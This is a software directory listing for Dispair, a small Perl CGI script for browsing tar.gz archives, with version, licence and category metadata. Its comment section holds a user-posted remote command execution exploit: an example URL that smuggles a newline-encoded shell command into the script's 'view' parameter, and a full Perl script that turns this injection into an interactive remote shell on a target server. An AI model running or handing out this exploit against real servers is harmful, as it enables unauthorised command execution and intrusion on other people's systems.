About:
Dispair (DISPlay Archives In Realtime) is a tiny CGI-script written in Perl that lets users browse tar.gz archives.

Author:
Daniel Stenberg [contact developer]

Rating:	reset 1 2 3 4 5 6 7 8 9 10
(not rated)

Homepage:
http://www.contactor.se/~dast/dispair/
Tar/GZ:
http://www.contactor.se/~dast/dispair/dispair-0.3.tar.gz

Trove categories: [change]

[Development Status]		5 - Production/Stable
[Environment]		Web Environment
[Intended Audience]		Developers, End Users/Desktop
[License]		OSI Approved :: BSD License (original)
[Operating System]		POSIX
[Programming Language]		Perl
[Topic]		Internet :: WWW/HTTP, Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries

Dependencies: [change]
No dependencies filed

 Branches

Branch	Version	Last release	License	URLs
Default	0.3	31-Jul-2002	BSD License (original)

 Comments

[»] remote command execution exploit
by Error: user not found. - Jul 30th 2002 16:47:05

http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id

Here is a perl script that provides a shell-like interface:

#!/usr/bin/perl

use strict;
use IO::Socket;

my $target = shift || die "usage: $0 <targetserver>";
my $cmd = '';

while ($cmd ne 'exit') {
print ">> "; $cmd = <STDIN>; chomp $cmd;
$cmd =~ s/ /%20/g;
my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
print $socket "Host: $target\n";
print $socket "USER-AGENT: scriptkiddie\n\n";
while (<$socket>) { last if ($_ =~ m/^\r/); }
while (<$socket>) { print; }
close $socket;
}

[reply] [top]